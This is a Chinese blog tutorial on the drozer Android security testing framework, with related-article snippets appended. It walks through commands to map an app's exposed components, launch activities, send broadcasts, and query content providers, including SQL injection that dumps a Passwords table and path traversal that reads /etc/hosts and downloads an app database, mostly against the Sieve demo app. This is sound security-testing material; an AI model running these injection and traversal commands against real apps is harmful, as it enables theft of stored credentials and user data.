Drozer的使用

最新推荐文章于 2022-08-06 16:41:51 发布
最新推荐文章于 2022-08-06 16:41:51 发布
阅读量1.7k 收藏 4
点赞数
分类专栏: 发布 实用技术 文章标签: drozer 安全检测 dz 安卓app
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianxiawoyougood/article/details/78053958
版权

前言

前面已经讲了drozer的安装和启动,如果你发现执行命令的时候,出现

adb server version (31)doesn't match this client (39);killing...
error:could not install *smartsocket* listener: cannot bind to ...(10048)

很可能是360手机助手占用了端口,手机卸载360手机助手,Windows结束360手机助手的进程。

下面开始实战。

一、连接手机,进入dz

在前面讲安装dz的时候,已经讲了这部分。
大体说一下吧。
手机电脑数据线连接,将手机上的drozer Agent设置Enabled。
电脑执行

adb forward tcp:31415 tcp:31415

drozer console connect

进入dz。

二、操作

1、根据关键字可以查找包名列表
run app.package.list -f com.***
2、获取app信息
run app.package.info -a com.***

这里写图片描述

3、识别应用的攻击面
run app.package.attacksurface com.***

这里写图片描述

4、查看activity的详情

Activity是Android四大组件之一,它用于展示界面。Activity是一个应用程序组件,提供一个屏幕,用户可以用来交互为了完成某项任务。Activity中所有操作都与用户密切相关,是一个负责与用户交互的组件,可以通过setContentView(View)来显示指定控件。在一个android应用中,一个Activity通常就是一个单独的屏幕,它上面可以显示一些控件也可以监听并处理用户的事件做出响应。Activity之间通过Intent进行通信。

run app.activity.info -a com.***

这里写图片描述

// 使用这个命令可以查看更详细的内容
run app.activity.info -a com.** -i
5、使用drozer启动这个activity

根据上一节我们知道了这个activity的全称,我们早已知包名。
执行:

run app.activity.start –-component com.sgcc.xingfu com.sgcc.xingfu.activity.SplashActivity

执行后,发现可以启动这个页面,这个页面是引导页。

6、查看的broadcast的详情

在Android中,Broadcast是一种广泛运用的在应用程序之间传输信息的机制。而BroadcastReceiver是对发送出来的Broadcast进行过滤接受并响应的一类组件。广播接收者(BroadcastReceiver)用于接收广播Intent的, 广播Intent的发送是通过调用sendBroadcast/sendOrderedBroadcast来实现的。通常一个广播Intent可以被订阅了此Intent的多个广播接收者所接收。

run app.broadcast.info -a com***

这里写图片描述

// 使用这个命令查看broadcast更详细的信息,包括action
run app.broadcast.info -a com.***  -i

这里写图片描述

run app.broadcast.send --component  包名 广播名
run app.broadcast.send --component 包名 --action android.intent.action.XXX
7、content provider

ContentProvider:内容提供者是应用程序之间共享数据的接口,使用ContentProvider共享数据的好处是统一了数据访问方式。

run app.provider.info -a com.**

这里写图片描述

8、查找uri
run app.provider.finduri com.***

这里写图片描述

获取所有可以访问的Uri

run scanner.provider.finduris -a com.***

这里写图片描述

对数据进行查看

// 假设存在暴露的provider
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical

简单的SQL注入

//假设暴露的是
//content://com.**.sieve.DBContentProvider/Passwords/
// 执行
dz> run app.provider.query content://com.**/Passwords/ --projection "'"  
unrecognized token: "' FROM Passwords" (code 1): , while compiling: SELECT ' FROM Passwords  

dz> run app.provider.query content://com.**/Passwords/ --selection "'"  
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')  

dz> run app.provider.query content://com.**/Passwords/ --projection "*" 
| _id | service | username | password | email |  

dz> run app.provider.query content://com.**/Passwords/ --projection "* from sqlite_master where 1=1; --" 
// 下面是表格
// 为了方便看,整理了一下
typenametbl_namerootpagesql
tableandroid_metadataandroid_metadata3CREATE TABLE android_meta data (locale TEXT)
tablePasswordsPasswords4CREATE TABLE Passwords (_id INTEGER PRIMARY KEY,service TEXT,username TEXT,password BLOB,email )
tableKeyKey5CREATE TABLE Key (Password TEXT PRIMARY KEY,pin TEXT )
indexsqlite_autoindex_Key_1Key6null

检测sql注入和目录遍历

run scanner.provider.injection -a com.**  

run scanner.provider.traversal -a com.**

遍历下载文件

run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts  

dz> run app.provider.download content://com.**.FileBackupProvider/data/data/com.**.sie  
ve/databases/database.db/home/user/database.db
9、查看暴露的service

很多情况下,一些与用户很少需要产生交互的应用程序,我们一般让它们在后台运行就行了,而且在它们运行期间我们仍然能运行其他的应用。为了处理这种后台进程,Android引入了Service的概念。

run app.service.info -a com.***

这里写图片描述

注:此APP已经优化,复现不了以上步骤,大家可以自己写个demo或者从网络上download其他工程进行操作。

孙家二哥
关注
专栏目录
drozer简介及使用
08-27
目录 1 Drozer简介 2 2 Drozer的特点 2 3 Drozer的安装 3 3.1 硬件要求 3 3.2 安装准备 3 3.3 安装控制台 4 3.4 安装客户端代理 4 4 drozer使用 4 4.1启动agent,使用drozer连接客户端agent 4 4.2 drozer命令 4 4.3 测试应用程序(sieve) 5 drozer是一款针对Android系统的安全测试框架。Drozer可以通过与Dalivik VM,其它应用程序的IPC端点以及底层操作系统的交互,避免正处于开发阶段,或者部署于你的组织的android应用程序和设备暴露出不可接受的安全风险。 drozer提供了很多Android平台下的渗透测试exploit供你使用和分享。对于远程漏洞,drozer能够生产shellcode帮助你部署drozer代理作为一个远程管理工具,最大化对设备的利用。 更快的Android安全评估 drozer可以大大缩减Android安全评估的耗时,通过攻击测试暴露Android APP的漏洞。 基于真机的测试 drozer运行在Android模拟器和真实设备上,它不需要USB调试或其他开发即可使用。 自动化和扩展 drozer有很多扩展模块,你可以找到他们进行测试以发现Android安全问题。
drozer使用
weixin_30700099的博客
10-26 56
配置环境略 可参考链接:http://m.blog.csdn.net/blog/zsch591488385/38423627 adb forward tcp:31415 tcp:31415 思路: 1.Runapp.packege.list–f 关键字 2. Run app.package.attacksurface 包名 3. Run app.*.info -a 包名 ...
kali 安装Android安全测试框架Drozer
北风
03-18 2721
Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。Adb就是一个命令行窗口,用于通过电脑端与模拟器或者真实设备交互。 一、 安装drozer: 环境:kali 2.0 root@kali:~# git clone https://github.com/mwrlabs/drozer/ root@kali:~# cd drozer/ roo...
Drozer 使用说明
lei7143的专栏
06-15 3079
1、安装JDK 、SDK、python ,并设置到环境变量 2、下载drozer 、下载 agent.apk https://labs.mwrinfosecurity.com/tools/drozer/ 3、安装drozer ,并将其加入python 路径 方法: python site-packages 下创建 .pth 文件 C:\Python27\Lib\site-packag...
安全测试工具】Drozer介绍及使用
songbai220
08-18 1453
一、前言: 项目测试间隙调研了下移动APP安全测试,发现不少文档都提到了Drozer这款安全测试工具,遂拿来学习并投入项目中实践下。 二、Drozer介绍: Drozer是一款针对Android的安全测试框架,分为安装在PC端的控制台、安装在终端上的代理APP两部分。可以利用APP的IPC通信,动态的发现被测试APP安全风险。 三、安装 1、官方下载地址 https://labs.mwrinfosecurity.com/tools/drozer/ 2、安装比较...
利用drozer进行Android渗透测试
weixin_30585437的博客
12-23 62
一、安装与启动 1.安装 第一步:从http://mwr.to/drozer下载Drozer(WindowsInstaller) 第二步:在Android设备中安装agent.apk adbinstallagent.apk 2.启动 第一步:在PC上使用adb进行端口转发,转发到Drozer使用的端口31415 adb forward t...
Drozer使用指南
01-25
**Drozer 使用指南** Drozer 是一款强大的Android安全评估工具,由MWR InfoSecurity开发,用于检测和利用Android应用程序、系统服务以及设备上的安全漏洞。它通过提供一套全面的API,使得安全研究人员和渗透测试...
android安全框架工具drozer使用指南
11-28
2. 在CMD中,使用`adb devices`检查设备连接,`adb forward tcp:31415 tcp:31415`设置端口转发,然后`drozer.bat console connect`连接到手机。 3. 开始测试: - `run app.package.list –f shinow`查找APP全称。 ...
Drozer使用手册(APP安全测试)
01-07
使用 drozer 之前,用户需要对 Android 平台有一定的了解,特别是它的 IPC 机制。推荐先阅读 Android 开发者指南。此外,"移动应用程序黑客手册"也是一份有价值的资源,其中详细介绍了 Android 安全概念和 drozer ...
Drozer 使用指南英文版.rar
02-25
Drozer 使用指南英文版 Drozer 有助于提供信心,即由您的组织开发或部署的 Android 应用程序和设备不会带来不可接受的风险。通过允许您与 DalvikVM、其他应用程序的 IPC 端点和底层操作系统进行交互 Drozer 提供了...
Drozer 使用指南(中文版).pdf
02-25
Drozer使用指南详细介绍了如何安装和使用这个工具,包括了对Drozer概念的讲解、如何安装以及在不同操作系统环境下的配置方法。尽管文档中有些内容是通过OCR扫描得到的,可能包含技术原因导致的个别字识别错误或漏...
drozer测试 content provider相关的几个常见问题及判断方法
潇湘淑女
05-11 1018
drozer使用
Drozer的安装与使用 | Android逆向工具
weixin_43525479的博客
06-14 9134
Drozer的安装与使用 Android逆向工具
《移动安全》(6)使用drozer检测四大组件(下)
午夜安全
10-05 4636
《移动安全》(6)使用drozer检测四大组件(下) 在drozer console中直接使用help查看;然后进一步使用help command可查看各命令更具体的使用方法。通过输入安装包的部分关键字查找包全称 run app.package.list -f 安装包部分关键字run app.package.list -f demo使用app.package.info模块查看apk基本信息run app.package.info -a ...
android应用APP-安全测试 drozer
煜铭2011
10-04 3226
0x00 前言   Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。其官方文档说道:“Drozer允许你一一个普通android应用的身份与其他应用和操作系统交互。”在Web世界已经有了许多安全测试工具了,我们只需要给出一个目标,这些工具就会自动为我们安全测试报告。但Drozer与这样的自动化扫描器不同,Drozer是一种交互式的安
Android安全测试用例(网络资源学习记录)
天在等我,菜鸟想飞
12-30 7223
数字签名检测 C:\Program Files\Java\jdk1.8.0_111\bin\jarsigner.exe -verify APK 文 件 路 径 -verbose –certs 当输出结果为“jar 已验证”时,表示签名正常 检测签名的 CN 及其他字段是否正确标识客户端程序的来源和发布者身份 如上图,说明测试结果为安全。 要说明的是,只有在使用直接客户的证书签名时,才认为安全。 Debug 证书、第三方(如 开发方)证书等等均认为风险。 反编译检测 把 apk 当成 zip
drozer报错解决
杉木人
07-30 3546
1、安装好drozer的PC端和手机端后 2、CMD下输入 drozer console connect 3、可能出现下列问题  问题一(找不到Java路径): Could not find java. Please ensure that it is installed and on your PATH. If this error persists, specify the p...
安全测试-Drozer安全测试框架实践记录篇
qq_34381178的博客
08-06 4942
二、环境部署一、Drozer简介Drozer是MWR Labs开发的一款Android安全测试框架。是目前最好的Android安全测试工具之一。其官方文档说道:“Drozer允许你一一个普通android应用的身份与其他应用和操作系统交互。”在Web世界已经有了许多安全测试工具了,我们只需要给出一个目标,这些工具就会自动为我们安全测试报告。但Drozer与这样的自动化扫描器不同,Drozer是一种交互式的安全测试工具。......
Android-APP安全(二)测试
子曰小玖的博客
09-10 1259
APP面临的主要风险 客户端: 传统逆向分析类(反编译、调试、加密/签名破解…) 用户已经中招类(输入记录、导出组件、进程注入…) 服务端: 系统组件类(MS12-020、ShellShock、心血、ST2…) 业务应用类(注入跨站越权执行上传下载弱口令…) 本地客户端测试 本章我主要介绍的本地客户端的测试,所需要的环境、工具、APK文件结构、架构、测试点等。 ...
drozer使用教程
最新发布
07-27
drozer是一款用于安卓应用程序安全评估和渗透测试的工具。下面是一个简单的drozer使用教程: 1. 安装drozer:首先,你需要在你的机器上安装drozer。你可以从官方网站(https://github.com/FSecureLABS/drozer)下载最新的二进制版本,并按照官方文档进行安装。 2. 连接设备:将你的安卓设备连接到计算机,并确保已启用USB调试模式。你可以在设备的开发者选项中启用USB调试模式。 3. 启动drozer控制台:在命令行中输入`drozer console connect`命令来启动drozer控制台,并连接到你的设备。 4. 扫描应用程序:使用`run app.package.list`命令来列出设备上安装的应用程序包名。选择你想要评估或测试的应用程序,并记下其包名。 5. 选择目标应用程序:使用`run app.package.attacksurface <包名>`命令来选择目标应用程序,并获取有关其攻击面的信息。这将显示应用程序的组件、权限和接口等信息。 6. 进行漏洞扫描:使用`run scanner.<scanner_name>`命令来执行特定漏洞扫描。drozer提供了一系列内置的扫描器,例如`scanner.activity.injection`用于检测活动注入漏洞,`scanner.provider.query`用于检测内容提供者查询漏洞等。 7. 漏洞利用和渗透测试:如果你发现了漏洞,你可以使用drozer提供的一些模块来利用这些漏洞。例如,`run exploit.<exploit_name>`命令用于执行特定漏洞利用。 8. 退出drozer控制台:当你完成评估和测试后,可以使用`exit`命令退出drozer控制台。 请注意,drozer是一个强大的工具,需要谨慎使用。在使用drozer对任何应用程序进行评估和测试之前,请确保你具有合法的授权,并遵守适用的法律和道德准则。同时,也建议在安全环境中进行测试,以防止对正式环境造成任何损害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值